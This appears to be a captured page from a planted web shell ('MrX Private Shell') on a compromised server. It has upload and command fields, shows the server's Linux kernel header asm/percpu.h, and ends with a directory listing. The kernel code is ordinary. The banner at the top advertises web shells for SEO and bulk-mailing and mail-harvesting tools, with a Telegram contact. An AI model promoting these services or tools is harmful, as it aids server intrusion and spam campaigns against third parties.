__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
/* SPDX-License-Identifier: GPL-2.0 */
#ifndef _ASM_X86_PERCPU_H
#define _ASM_X86_PERCPU_H

#ifdef CONFIG_X86_64
# define __percpu_seg		gs
# define __percpu_rel		(%rip)
#else
# define __percpu_seg		fs
# define __percpu_rel
#endif

#ifdef __ASSEMBLER__

#ifdef CONFIG_SMP
# define __percpu		%__percpu_seg:
#else
# define __percpu
#endif

#define PER_CPU_VAR(var)	__percpu(var)__percpu_rel

#ifdef CONFIG_X86_64_SMP
# define INIT_PER_CPU_VAR(var)  init_per_cpu__##var
#else
# define INIT_PER_CPU_VAR(var)  var
#endif

#else /* !__ASSEMBLY__: */

#include <linux/build_bug.h>
#include <linux/stringify.h>
#include <asm/asm.h>

#ifdef CONFIG_SMP

#ifdef CONFIG_CC_HAS_NAMED_AS

#ifdef __CHECKER__
# define __seg_gs		__attribute__((address_space(__seg_gs)))
# define __seg_fs		__attribute__((address_space(__seg_fs)))
#endif

#ifdef CONFIG_X86_64
# define __percpu_seg_override	__seg_gs
#else
# define __percpu_seg_override	__seg_fs
#endif

#define __percpu_prefix		""

#else /* !CONFIG_CC_HAS_NAMED_AS: */

#define __percpu_seg_override
#define __percpu_prefix		"%%"__stringify(__percpu_seg)":"

#endif /* CONFIG_CC_HAS_NAMED_AS */

#define __force_percpu_prefix	"%%"__stringify(__percpu_seg)":"
#define __my_cpu_offset		this_cpu_read(this_cpu_off)

/*
 * Compared to the generic __my_cpu_offset version, the following
 * saves one instruction and avoids clobbering a temp register.
 *
 * arch_raw_cpu_ptr should not be used in 32-bit VDSO for a 64-bit
 * kernel, because games are played with CONFIG_X86_64 there and
 * sizeof(this_cpu_off) becames 4.
 */
#ifndef BUILD_VDSO32_64
#define arch_raw_cpu_ptr(_ptr)						\
({									\
	unsigned long tcp_ptr__ = raw_cpu_read_long(this_cpu_off);	\
									\
	tcp_ptr__ += (__force unsigned long)(_ptr);			\
	(typeof(*(_ptr)) __kernel __force *)tcp_ptr__;			\
})
#else
#define arch_raw_cpu_ptr(_ptr) ({ BUILD_BUG(); (typeof(_ptr))0; })
#endif

#define PER_CPU_VAR(var)	%__percpu_seg:(var)__percpu_rel

#else /* !CONFIG_SMP: */

#define __percpu_seg_override
#define __percpu_prefix		""
#define __force_percpu_prefix	""

#define PER_CPU_VAR(var)	(var)__percpu_rel

#endif /* CONFIG_SMP */

#define __my_cpu_type(var)	typeof(var) __percpu_seg_override
#define __my_cpu_ptr(ptr)	(__my_cpu_type(*(ptr))*)(__force uintptr_t)(ptr)
#define __my_cpu_var(var)	(*__my_cpu_ptr(&(var)))
#define __percpu_arg(x)		__percpu_prefix "%" #x
#define __force_percpu_arg(x)	__force_percpu_prefix "%" #x

/*
 * Initialized pointers to per-CPU variables needed for the boot
 * processor need to use these macros to get the proper address
 * offset from __per_cpu_load on SMP.
 *
 * There also must be an entry in vmlinux_64.lds.S
 */
#define DECLARE_INIT_PER_CPU(var) \
       extern typeof(var) init_per_cpu_var(var)

#ifdef CONFIG_X86_64_SMP
# define init_per_cpu_var(var)  init_per_cpu__##var
#else
# define init_per_cpu_var(var)  var
#endif

/*
 * For arch-specific code, we can use direct single-insn ops (they
 * don't give an lvalue though).
 */

#define __pcpu_type_1		u8
#define __pcpu_type_2		u16
#define __pcpu_type_4		u32
#define __pcpu_type_8		u64

#define __pcpu_cast_1(val)	((u8)(((unsigned long) val) & 0xff))
#define __pcpu_cast_2(val)	((u16)(((unsigned long) val) & 0xffff))
#define __pcpu_cast_4(val)	((u32)(((unsigned long) val) & 0xffffffff))
#define __pcpu_cast_8(val)	((u64)(val))

#define __pcpu_op1_1(op, dst)	op "b " dst
#define __pcpu_op1_2(op, dst)	op "w " dst
#define __pcpu_op1_4(op, dst)	op "l " dst
#define __pcpu_op1_8(op, dst)	op "q " dst

#define __pcpu_op2_1(op, src, dst) op "b " src ", " dst
#define __pcpu_op2_2(op, src, dst) op "w " src ", " dst
#define __pcpu_op2_4(op, src, dst) op "l " src ", " dst
#define __pcpu_op2_8(op, src, dst) op "q " src ", " dst

#define __pcpu_reg_1(mod, x)	mod "q" (x)
#define __pcpu_reg_2(mod, x)	mod "r" (x)
#define __pcpu_reg_4(mod, x)	mod "r" (x)
#define __pcpu_reg_8(mod, x)	mod "r" (x)

#define __pcpu_reg_imm_1(x)	"qi" (x)
#define __pcpu_reg_imm_2(x)	"ri" (x)
#define __pcpu_reg_imm_4(x)	"ri" (x)
#define __pcpu_reg_imm_8(x)	"re" (x)

#ifdef CONFIG_USE_X86_SEG_SUPPORT

#define __raw_cpu_read(size, qual, pcp)					\
({									\
	*(qual __my_cpu_type(pcp) *)__my_cpu_ptr(&(pcp));		\
})

#define __raw_cpu_write(size, qual, pcp, val)				\
do {									\
	*(qual __my_cpu_type(pcp) *)__my_cpu_ptr(&(pcp)) = (val);	\
} while (0)

#define __raw_cpu_read_const(pcp)	__raw_cpu_read(, , pcp)

#else /* !CONFIG_USE_X86_SEG_SUPPORT: */

#define __raw_cpu_read(size, qual, _var)				\
({									\
	__pcpu_type_##size pfo_val__;					\
									\
	asm qual (__pcpu_op2_##size("mov", __percpu_arg([var]), "%[val]") \
	    : [val] __pcpu_reg_##size("=", pfo_val__)			\
	    : [var] "m" (__my_cpu_var(_var)));				\
									\
	(typeof(_var))(unsigned long) pfo_val__;			\
})

#define __raw_cpu_write(size, qual, _var, _val)				\
do {									\
	__pcpu_type_##size pto_val__ = __pcpu_cast_##size(_val);	\
									\
	if (0) {		                                        \
		typeof(_var) pto_tmp__;					\
		pto_tmp__ = (_val);					\
		(void)pto_tmp__;					\
	}								\
	asm qual(__pcpu_op2_##size("mov", "%[val]", __percpu_arg([var])) \
	    : [var] "=m" (__my_cpu_var(_var))				\
	    : [val] __pcpu_reg_imm_##size(pto_val__));			\
} while (0)

/*
 * The generic per-CPU infrastrucutre is not suitable for
 * reading const-qualified variables.
 */
#define __raw_cpu_read_const(pcp)	({ BUILD_BUG(); (typeof(pcp))0; })

#endif /* CONFIG_USE_X86_SEG_SUPPORT */

#define __raw_cpu_read_stable(size, _var)				\
({									\
	__pcpu_type_##size pfo_val__;					\
									\
	asm(__pcpu_op2_##size("mov", __force_percpu_arg(a[var]), "%[val]") \
	    : [val] __pcpu_reg_##size("=", pfo_val__)			\
	    : [var] "i" (&(_var)));					\
									\
	(typeof(_var))(unsigned long) pfo_val__;			\
})

#define percpu_unary_op(size, qual, op, _var)				\
({									\
	asm qual (__pcpu_op1_##size(op, __percpu_arg([var]))		\
	    : [var] "+m" (__my_cpu_var(_var)));				\
})

#define percpu_binary_op(size, qual, op, _var, _val)			\
do {									\
	__pcpu_type_##size pto_val__ = __pcpu_cast_##size(_val);	\
									\
	if (0) {		                                        \
		typeof(_var) pto_tmp__;					\
		pto_tmp__ = (_val);					\
		(void)pto_tmp__;					\
	}								\
	asm qual(__pcpu_op2_##size(op, "%[val]", __percpu_arg([var]))	\
	    : [var] "+m" (__my_cpu_var(_var))				\
	    : [val] __pcpu_reg_imm_##size(pto_val__));			\
} while (0)

/*
 * Generate a per-CPU add to memory instruction and optimize code
 * if one is added or subtracted.
 */
#define percpu_add_op(size, qual, var, val)				\
do {									\
	const int pao_ID__ =						\
		(__builtin_constant_p(val) &&				\
			((val) == 1 ||					\
			 (val) == (typeof(val))-1)) ? (int)(val) : 0;	\
									\
	if (0) {							\
		typeof(var) pao_tmp__;					\
		pao_tmp__ = (val);					\
		(void)pao_tmp__;					\
	}								\
	if (pao_ID__ == 1)						\
		percpu_unary_op(size, qual, "inc", var);		\
	else if (pao_ID__ == -1)					\
		percpu_unary_op(size, qual, "dec", var);		\
	else								\
		percpu_binary_op(size, qual, "add", var, val);		\
} while (0)

/*
 * Add return operation
 */
#define percpu_add_return_op(size, qual, _var, _val)			\
({									\
	__pcpu_type_##size paro_tmp__ = __pcpu_cast_##size(_val);	\
									\
	asm qual (__pcpu_op2_##size("xadd", "%[tmp]",			\
				     __percpu_arg([var]))		\
		  : [tmp] __pcpu_reg_##size("+", paro_tmp__),		\
		    [var] "+m" (__my_cpu_var(_var))			\
		  : : "memory");					\
	(typeof(_var))(unsigned long) (paro_tmp__ + _val);		\
})

/*
 * raw_cpu_xchg() can use a load-store since
 * it is not required to be IRQ-safe.
 */
#define raw_percpu_xchg_op(_var, _nval)					\
({									\
	typeof(_var) pxo_old__ = raw_cpu_read(_var);			\
									\
	raw_cpu_write(_var, _nval);					\
									\
	pxo_old__;							\
})

/*
 * this_cpu_xchg() is implemented using CMPXCHG without a LOCK prefix.
 * XCHG is expensive due to the implied LOCK prefix. The processor
 * cannot prefetch cachelines if XCHG is used.
 */
#define this_percpu_xchg_op(_var, _nval)				\
({									\
	typeof(_var) pxo_old__ = this_cpu_read(_var);			\
									\
	do { } while (!this_cpu_try_cmpxchg(_var, &pxo_old__, _nval));	\
									\
	pxo_old__;							\
})

/*
 * CMPXCHG has no such implied lock semantics as a result it is much
 * more efficient for CPU-local operations.
 */
#define percpu_cmpxchg_op(size, qual, _var, _oval, _nval)		\
({									\
	__pcpu_type_##size pco_old__ = __pcpu_cast_##size(_oval);	\
	__pcpu_type_##size pco_new__ = __pcpu_cast_##size(_nval);	\
									\
	asm qual (__pcpu_op2_##size("cmpxchg", "%[nval]",		\
				    __percpu_arg([var]))		\
		  : [oval] "+a" (pco_old__),				\
		    [var] "+m" (__my_cpu_var(_var))			\
		  : [nval] __pcpu_reg_##size(, pco_new__)		\
		  : "memory");						\
									\
	(typeof(_var))(unsigned long) pco_old__;			\
})

#define percpu_try_cmpxchg_op(size, qual, _var, _ovalp, _nval)		\
({									\
	bool success;							\
	__pcpu_type_##size *pco_oval__ = (__pcpu_type_##size *)(_ovalp); \
	__pcpu_type_##size pco_old__ = *pco_oval__;			\
	__pcpu_type_##size pco_new__ = __pcpu_cast_##size(_nval);	\
									\
	asm qual (__pcpu_op2_##size("cmpxchg", "%[nval]",		\
				    __percpu_arg([var]))		\
		  CC_SET(z)						\
		  : CC_OUT(z) (success),				\
		    [oval] "+a" (pco_old__),				\
		    [var] "+m" (__my_cpu_var(_var))			\
		  : [nval] __pcpu_reg_##size(, pco_new__)		\
		  : "memory");						\
	if (unlikely(!success))						\
		*pco_oval__ = pco_old__;				\
									\
	likely(success);						\
})

#if defined(CONFIG_X86_32) && !defined(CONFIG_UML)

#define percpu_cmpxchg64_op(size, qual, _var, _oval, _nval)		\
({									\
	union {								\
		u64 var;						\
		struct {						\
			u32 low, high;					\
		};							\
	} old__, new__;							\
									\
	old__.var = _oval;						\
	new__.var = _nval;						\
									\
	asm qual (ALTERNATIVE("call this_cpu_cmpxchg8b_emu",		\
			      "cmpxchg8b " __percpu_arg([var]), X86_FEATURE_CX8) \
		  : ALT_OUTPUT_SP([var] "+m" (__my_cpu_var(_var)),	\
				  "+a" (old__.low),			\
				  "+d" (old__.high))			\
		  : "b" (new__.low),					\
		    "c" (new__.high),					\
		    "S" (&(_var))					\
		  : "memory");						\
									\
	old__.var;							\
})

#define raw_cpu_cmpxchg64(pcp, oval, nval)		percpu_cmpxchg64_op(8,         , pcp, oval, nval)
#define this_cpu_cmpxchg64(pcp, oval, nval)		percpu_cmpxchg64_op(8, volatile, pcp, oval, nval)

#define percpu_try_cmpxchg64_op(size, qual, _var, _ovalp, _nval)	\
({									\
	bool success;							\
	u64 *_oval = (u64 *)(_ovalp);					\
	union {								\
		u64 var;						\
		struct {						\
			u32 low, high;					\
		};							\
	} old__, new__;							\
									\
	old__.var = *_oval;						\
	new__.var = _nval;						\
									\
	asm qual (ALTERNATIVE("call this_cpu_cmpxchg8b_emu",		\
			      "cmpxchg8b " __percpu_arg([var]), X86_FEATURE_CX8) \
		  CC_SET(z)						\
		  : ALT_OUTPUT_SP(CC_OUT(z) (success),			\
				  [var] "+m" (__my_cpu_var(_var)),	\
				  "+a" (old__.low),			\
				  "+d" (old__.high))			\
		  : "b" (new__.low),					\
		    "c" (new__.high),					\
		    "S" (&(_var))					\
		  : "memory");						\
	if (unlikely(!success))						\
		*_oval = old__.var;					\
									\
	likely(success);						\
})

#define raw_cpu_try_cmpxchg64(pcp, ovalp, nval)		percpu_try_cmpxchg64_op(8,         , pcp, ovalp, nval)
#define this_cpu_try_cmpxchg64(pcp, ovalp, nval)	percpu_try_cmpxchg64_op(8, volatile, pcp, ovalp, nval)

#endif /* defined(CONFIG_X86_32) && !defined(CONFIG_UML) */

#ifdef CONFIG_X86_64
#define raw_cpu_cmpxchg64(pcp, oval, nval)		percpu_cmpxchg_op(8,         , pcp, oval, nval);
#define this_cpu_cmpxchg64(pcp, oval, nval)		percpu_cmpxchg_op(8, volatile, pcp, oval, nval);

#define raw_cpu_try_cmpxchg64(pcp, ovalp, nval)		percpu_try_cmpxchg_op(8,         , pcp, ovalp, nval);
#define this_cpu_try_cmpxchg64(pcp, ovalp, nval)	percpu_try_cmpxchg_op(8, volatile, pcp, ovalp, nval);

#define percpu_cmpxchg128_op(size, qual, _var, _oval, _nval)		\
({									\
	union {								\
		u128 var;						\
		struct {						\
			u64 low, high;					\
		};							\
	} old__, new__;							\
									\
	old__.var = _oval;						\
	new__.var = _nval;						\
									\
	asm qual (ALTERNATIVE("call this_cpu_cmpxchg16b_emu",		\
			      "cmpxchg16b " __percpu_arg([var]), X86_FEATURE_CX16) \
		  : ALT_OUTPUT_SP([var] "+m" (__my_cpu_var(_var)),	\
				  "+a" (old__.low),			\
				  "+d" (old__.high))			\
		  : "b" (new__.low),					\
		    "c" (new__.high),					\
		    "S" (&(_var))					\
		  : "memory");						\
									\
	old__.var;							\
})

#define raw_cpu_cmpxchg128(pcp, oval, nval)		percpu_cmpxchg128_op(16,         , pcp, oval, nval)
#define this_cpu_cmpxchg128(pcp, oval, nval)		percpu_cmpxchg128_op(16, volatile, pcp, oval, nval)

#define percpu_try_cmpxchg128_op(size, qual, _var, _ovalp, _nval)	\
({									\
	bool success;							\
	u128 *_oval = (u128 *)(_ovalp);					\
	union {								\
		u128 var;						\
		struct {						\
			u64 low, high;					\
		};							\
	} old__, new__;							\
									\
	old__.var = *_oval;						\
	new__.var = _nval;						\
									\
	asm qual (ALTERNATIVE("call this_cpu_cmpxchg16b_emu",		\
			      "cmpxchg16b " __percpu_arg([var]), X86_FEATURE_CX16) \
		  CC_SET(z)						\
		  : ALT_OUTPUT_SP(CC_OUT(z) (success),			\
				  [var] "+m" (__my_cpu_var(_var)),	\
				  "+a" (old__.low),			\
				  "+d" (old__.high))			\
		  : "b" (new__.low),					\
		    "c" (new__.high),					\
		    "S" (&(_var))					\
		  : "memory");						\
	if (unlikely(!success))						\
		*_oval = old__.var;					\
	likely(success);						\
})

#define raw_cpu_try_cmpxchg128(pcp, ovalp, nval)	percpu_try_cmpxchg128_op(16,         , pcp, ovalp, nval)
#define this_cpu_try_cmpxchg128(pcp, ovalp, nval)	percpu_try_cmpxchg128_op(16, volatile, pcp, ovalp, nval)

#endif /* CONFIG_X86_64 */

#define raw_cpu_read_1(pcp)				__raw_cpu_read(1, , pcp)
#define raw_cpu_read_2(pcp)				__raw_cpu_read(2, , pcp)
#define raw_cpu_read_4(pcp)				__raw_cpu_read(4, , pcp)
#define raw_cpu_write_1(pcp, val)			__raw_cpu_write(1, , pcp, val)
#define raw_cpu_write_2(pcp, val)			__raw_cpu_write(2, , pcp, val)
#define raw_cpu_write_4(pcp, val)			__raw_cpu_write(4, , pcp, val)

#define this_cpu_read_1(pcp)				__raw_cpu_read(1, volatile, pcp)
#define this_cpu_read_2(pcp)				__raw_cpu_read(2, volatile, pcp)
#define this_cpu_read_4(pcp)				__raw_cpu_read(4, volatile, pcp)
#define this_cpu_write_1(pcp, val)			__raw_cpu_write(1, volatile, pcp, val)
#define this_cpu_write_2(pcp, val)			__raw_cpu_write(2, volatile, pcp, val)
#define this_cpu_write_4(pcp, val)			__raw_cpu_write(4, volatile, pcp, val)

#define this_cpu_read_stable_1(pcp)			__raw_cpu_read_stable(1, pcp)
#define this_cpu_read_stable_2(pcp)			__raw_cpu_read_stable(2, pcp)
#define this_cpu_read_stable_4(pcp)			__raw_cpu_read_stable(4, pcp)

#define raw_cpu_add_1(pcp, val)				percpu_add_op(1, , (pcp), val)
#define raw_cpu_add_2(pcp, val)				percpu_add_op(2, , (pcp), val)
#define raw_cpu_add_4(pcp, val)				percpu_add_op(4, , (pcp), val)
#define raw_cpu_and_1(pcp, val)				percpu_binary_op(1, , "and", (pcp), val)
#define raw_cpu_and_2(pcp, val)				percpu_binary_op(2, , "and", (pcp), val)
#define raw_cpu_and_4(pcp, val)				percpu_binary_op(4, , "and", (pcp), val)
#define raw_cpu_or_1(pcp, val)				percpu_binary_op(1, , "or", (pcp), val)
#define raw_cpu_or_2(pcp, val)				percpu_binary_op(2, , "or", (pcp), val)
#define raw_cpu_or_4(pcp, val)				percpu_binary_op(4, , "or", (pcp), val)
#define raw_cpu_xchg_1(pcp, val)			raw_percpu_xchg_op(pcp, val)
#define raw_cpu_xchg_2(pcp, val)			raw_percpu_xchg_op(pcp, val)
#define raw_cpu_xchg_4(pcp, val)			raw_percpu_xchg_op(pcp, val)

#define this_cpu_add_1(pcp, val)			percpu_add_op(1, volatile, (pcp), val)
#define this_cpu_add_2(pcp, val)			percpu_add_op(2, volatile, (pcp), val)
#define this_cpu_add_4(pcp, val)			percpu_add_op(4, volatile, (pcp), val)
#define this_cpu_and_1(pcp, val)			percpu_binary_op(1, volatile, "and", (pcp), val)
#define this_cpu_and_2(pcp, val)			percpu_binary_op(2, volatile, "and", (pcp), val)
#define this_cpu_and_4(pcp, val)			percpu_binary_op(4, volatile, "and", (pcp), val)
#define this_cpu_or_1(pcp, val)				percpu_binary_op(1, volatile, "or", (pcp), val)
#define this_cpu_or_2(pcp, val)				percpu_binary_op(2, volatile, "or", (pcp), val)
#define this_cpu_or_4(pcp, val)				percpu_binary_op(4, volatile, "or", (pcp), val)
#define this_cpu_xchg_1(pcp, nval)			this_percpu_xchg_op(pcp, nval)
#define this_cpu_xchg_2(pcp, nval)			this_percpu_xchg_op(pcp, nval)
#define this_cpu_xchg_4(pcp, nval)			this_percpu_xchg_op(pcp, nval)

#define raw_cpu_add_return_1(pcp, val)			percpu_add_return_op(1, , pcp, val)
#define raw_cpu_add_return_2(pcp, val)			percpu_add_return_op(2, , pcp, val)
#define raw_cpu_add_return_4(pcp, val)			percpu_add_return_op(4, , pcp, val)
#define raw_cpu_cmpxchg_1(pcp, oval, nval)		percpu_cmpxchg_op(1, , pcp, oval, nval)
#define raw_cpu_cmpxchg_2(pcp, oval, nval)		percpu_cmpxchg_op(2, , pcp, oval, nval)
#define raw_cpu_cmpxchg_4(pcp, oval, nval)		percpu_cmpxchg_op(4, , pcp, oval, nval)
#define raw_cpu_try_cmpxchg_1(pcp, ovalp, nval)		percpu_try_cmpxchg_op(1, , pcp, ovalp, nval)
#define raw_cpu_try_cmpxchg_2(pcp, ovalp, nval)		percpu_try_cmpxchg_op(2, , pcp, ovalp, nval)
#define raw_cpu_try_cmpxchg_4(pcp, ovalp, nval)		percpu_try_cmpxchg_op(4, , pcp, ovalp, nval)

#define this_cpu_add_return_1(pcp, val)			percpu_add_return_op(1, volatile, pcp, val)
#define this_cpu_add_return_2(pcp, val)			percpu_add_return_op(2, volatile, pcp, val)
#define this_cpu_add_return_4(pcp, val)			percpu_add_return_op(4, volatile, pcp, val)
#define this_cpu_cmpxchg_1(pcp, oval, nval)		percpu_cmpxchg_op(1, volatile, pcp, oval, nval)
#define this_cpu_cmpxchg_2(pcp, oval, nval)		percpu_cmpxchg_op(2, volatile, pcp, oval, nval)
#define this_cpu_cmpxchg_4(pcp, oval, nval)		percpu_cmpxchg_op(4, volatile, pcp, oval, nval)
#define this_cpu_try_cmpxchg_1(pcp, ovalp, nval)	percpu_try_cmpxchg_op(1, volatile, pcp, ovalp, nval)
#define this_cpu_try_cmpxchg_2(pcp, ovalp, nval)	percpu_try_cmpxchg_op(2, volatile, pcp, ovalp, nval)
#define this_cpu_try_cmpxchg_4(pcp, ovalp, nval)	percpu_try_cmpxchg_op(4, volatile, pcp, ovalp, nval)

/*
 * Per-CPU atomic 64-bit operations are only available under 64-bit kernels.
 * 32-bit kernels must fall back to generic operations.
 */
#ifdef CONFIG_X86_64

#define raw_cpu_read_8(pcp)				__raw_cpu_read(8, , pcp)
#define raw_cpu_write_8(pcp, val)			__raw_cpu_write(8, , pcp, val)

#define this_cpu_read_8(pcp)				__raw_cpu_read(8, volatile, pcp)
#define this_cpu_write_8(pcp, val)			__raw_cpu_write(8, volatile, pcp, val)

#define this_cpu_read_stable_8(pcp)			__raw_cpu_read_stable(8, pcp)

#define raw_cpu_add_8(pcp, val)				percpu_add_op(8, , (pcp), val)
#define raw_cpu_and_8(pcp, val)				percpu_binary_op(8, , "and", (pcp), val)
#define raw_cpu_or_8(pcp, val)				percpu_binary_op(8, , "or", (pcp), val)
#define raw_cpu_add_return_8(pcp, val)			percpu_add_return_op(8, , pcp, val)
#define raw_cpu_xchg_8(pcp, nval)			raw_percpu_xchg_op(pcp, nval)
#define raw_cpu_cmpxchg_8(pcp, oval, nval)		percpu_cmpxchg_op(8, , pcp, oval, nval)
#define raw_cpu_try_cmpxchg_8(pcp, ovalp, nval)		percpu_try_cmpxchg_op(8, , pcp, ovalp, nval)

#define this_cpu_add_8(pcp, val)			percpu_add_op(8, volatile, (pcp), val)
#define this_cpu_and_8(pcp, val)			percpu_binary_op(8, volatile, "and", (pcp), val)
#define this_cpu_or_8(pcp, val)				percpu_binary_op(8, volatile, "or", (pcp), val)
#define this_cpu_add_return_8(pcp, val)			percpu_add_return_op(8, volatile, pcp, val)
#define this_cpu_xchg_8(pcp, nval)			this_percpu_xchg_op(pcp, nval)
#define this_cpu_cmpxchg_8(pcp, oval, nval)		percpu_cmpxchg_op(8, volatile, pcp, oval, nval)
#define this_cpu_try_cmpxchg_8(pcp, ovalp, nval)	percpu_try_cmpxchg_op(8, volatile, pcp, ovalp, nval)

#define raw_cpu_read_long(pcp)				raw_cpu_read_8(pcp)

#else /* !CONFIG_X86_64: */

/* There is no generic 64-bit read stable operation for 32-bit targets. */
#define this_cpu_read_stable_8(pcp)			({ BUILD_BUG(); (typeof(pcp))0; })

#define raw_cpu_read_long(pcp)				raw_cpu_read_4(pcp)

#endif /* CONFIG_X86_64 */

#define this_cpu_read_const(pcp)			__raw_cpu_read_const(pcp)

/*
 * this_cpu_read() makes the compiler load the per-CPU variable every time
 * it is accessed while this_cpu_read_stable() allows the value to be cached.
 * this_cpu_read_stable() is more efficient and can be used if its value
 * is guaranteed to be valid across CPUs.  The current users include
 * pcpu_hot.current_task and pcpu_hot.top_of_stack, both of which are
 * actually per-thread variables implemented as per-CPU variables and
 * thus stable for the duration of the respective task.
 */
#define this_cpu_read_stable(pcp)			__pcpu_size_call_return(this_cpu_read_stable_, pcp)

#define x86_this_cpu_constant_test_bit(_nr, _var)			\
({									\
	unsigned long __percpu *addr__ =				\
		(unsigned long __percpu *)&(_var) + ((_nr) / BITS_PER_LONG); \
									\
	!!((1UL << ((_nr) % BITS_PER_LONG)) & raw_cpu_read(*addr__));	\
})

#define x86_this_cpu_variable_test_bit(_nr, _var)			\
({									\
	bool oldbit;							\
									\
	asm volatile("btl %[nr], " __percpu_arg([var])			\
		     CC_SET(c)						\
		     : CC_OUT(c) (oldbit)				\
		     : [var] "m" (__my_cpu_var(_var)),			\
		       [nr] "rI" (_nr));				\
	oldbit;								\
})

#define x86_this_cpu_test_bit(_nr, _var)				\
	(__builtin_constant_p(_nr)					\
	 ? x86_this_cpu_constant_test_bit(_nr, _var)			\
	 : x86_this_cpu_variable_test_bit(_nr, _var))


#include <asm-generic/percpu.h>

/* We can use this directly for local CPU (faster). */
DECLARE_PER_CPU_READ_MOSTLY(unsigned long, this_cpu_off);

#endif /* !__ASSEMBLER__ */

#ifdef CONFIG_SMP

/*
 * Define the "EARLY_PER_CPU" macros.  These are used for some per_cpu
 * variables that are initialized and accessed before there are per_cpu
 * areas allocated.
 */

#define	DEFINE_EARLY_PER_CPU(_type, _name, _initvalue)			\
	DEFINE_PER_CPU(_type, _name) = _initvalue;			\
	__typeof__(_type) _name##_early_map[NR_CPUS] __initdata =	\
				{ [0 ... NR_CPUS-1] = _initvalue };	\
	__typeof__(_type) *_name##_early_ptr __refdata = _name##_early_map

#define DEFINE_EARLY_PER_CPU_READ_MOSTLY(_type, _name, _initvalue)	\
	DEFINE_PER_CPU_READ_MOSTLY(_type, _name) = _initvalue;		\
	__typeof__(_type) _name##_early_map[NR_CPUS] __initdata =	\
				{ [0 ... NR_CPUS-1] = _initvalue };	\
	__typeof__(_type) *_name##_early_ptr __refdata = _name##_early_map

#define EXPORT_EARLY_PER_CPU_SYMBOL(_name)				\
	EXPORT_PER_CPU_SYMBOL(_name)

#define DECLARE_EARLY_PER_CPU(_type, _name)				\
	DECLARE_PER_CPU(_type, _name);					\
	extern __typeof__(_type) *_name##_early_ptr;			\
	extern __typeof__(_type)  _name##_early_map[]

#define DECLARE_EARLY_PER_CPU_READ_MOSTLY(_type, _name)			\
	DECLARE_PER_CPU_READ_MOSTLY(_type, _name);			\
	extern __typeof__(_type) *_name##_early_ptr;			\
	extern __typeof__(_type)  _name##_early_map[]

#define	early_per_cpu_ptr(_name)			(_name##_early_ptr)
#define	early_per_cpu_map(_name, _idx)			(_name##_early_map[_idx])

#define	early_per_cpu(_name, _cpu)					\
	*(early_per_cpu_ptr(_name) ?					\
		&early_per_cpu_ptr(_name)[_cpu] :			\
		&per_cpu(_name, _cpu))

#else /* !CONFIG_SMP: */
#define	DEFINE_EARLY_PER_CPU(_type, _name, _initvalue)			\
	DEFINE_PER_CPU(_type, _name) = _initvalue

#define DEFINE_EARLY_PER_CPU_READ_MOSTLY(_type, _name, _initvalue)	\
	DEFINE_PER_CPU_READ_MOSTLY(_type, _name) = _initvalue

#define EXPORT_EARLY_PER_CPU_SYMBOL(_name)				\
	EXPORT_PER_CPU_SYMBOL(_name)

#define DECLARE_EARLY_PER_CPU(_type, _name)				\
	DECLARE_PER_CPU(_type, _name)

#define DECLARE_EARLY_PER_CPU_READ_MOSTLY(_type, _name)			\
	DECLARE_PER_CPU_READ_MOSTLY(_type, _name)

#define	early_per_cpu(_name, _cpu)			per_cpu(_name, _cpu)
#define	early_per_cpu_ptr(_name)			NULL
/* no early_per_cpu_map() */

#endif /* !CONFIG_SMP */

#endif /* _ASM_X86_PERCPU_H */

Filemanager

Name Type Size Permission Actions
e820 Folder 0755
fpu Folder 0755
numachip Folder 0755
shared Folder 0755
trace Folder 0755
uv Folder 0755
vdso Folder 0755
xen Folder 0755
GEN-for-each-reg.h File 345 B 0644
Kbuild File 348 B 0644
acenv.h File 1.42 KB 0644
acpi.h File 6.16 KB 0644
acrn.h File 2.12 KB 0644
agp.h File 835 B 0644
alternative.h File 12.87 KB 0644
amd-ibs.h File 4.9 KB 0644
amd_hsmp.h File 364 B 0644
amd_nb.h File 1.59 KB 0644
amd_node.h File 1.41 KB 0644
apic.h File 14.79 KB 0644
apicdef.h File 5.52 KB 0644
apm.h File 1.73 KB 0644
arch_hweight.h File 1.06 KB 0644
archrandom.h File 1.46 KB 0644
asm-offsets.h File 35 B 0644
asm-prototypes.h File 587 B 0644
asm.h File 6.11 KB 0644
atomic.h File 4.36 KB 0644
atomic64_32.h File 7.81 KB 0644
atomic64_64.h File 4.26 KB 0644
audit.h File 351 B 0644
barrier.h File 2.37 KB 0644
bios_ebda.h File 914 B 0644
bitops.h File 11.06 KB 0644
boot.h File 2.46 KB 0644
bootparam_utils.h File 2.84 KB 0644
bug.h File 2.67 KB 0644
bugs.h File 344 B 0644
cache.h File 622 B 0644
cacheflush.h File 329 B 0644
cacheinfo.h File 485 B 0644
ce4100.h File 121 B 0644
cfi.h File 2.78 KB 0644
checksum.h File 323 B 0644
checksum_32.h File 4.57 KB 0644
checksum_64.h File 5.02 KB 0644
clocksource.h File 480 B 0644
cmdline.h File 375 B 0644
cmpxchg.h File 7.29 KB 0644
cmpxchg_32.h File 4.02 KB 0644
cmpxchg_64.h File 2.5 KB 0644
coco.h File 703 B 0644
compat.h File 2.35 KB 0644
cpu.h File 2.15 KB 0644
cpu_device_id.h File 9.02 KB 0644
cpu_entry_area.h File 4.1 KB 0644
cpufeature.h File 7.75 KB 0644
cpufeatures.h File 38.88 KB 0644
cpuid.h File 4.55 KB 0644
cpuidle_haltpoll.h File 189 B 0644
cpumask.h File 905 B 0644
crash.h File 300 B 0644
crash_reserve.h File 1.28 KB 0644
current.h File 1.18 KB 0644
debugreg.h File 4.41 KB 0644
delay.h File 275 B 0644
desc.h File 11.23 KB 0644
desc_defs.h File 4.84 KB 0644
device.h File 176 B 0644
disabled-features.h File 4.19 KB 0644
div64.h File 2.4 KB 0644
dma-mapping.h File 237 B 0644
dma.h File 9.47 KB 0644
dmi.h File 556 B 0644
doublefault.h File 351 B 0644
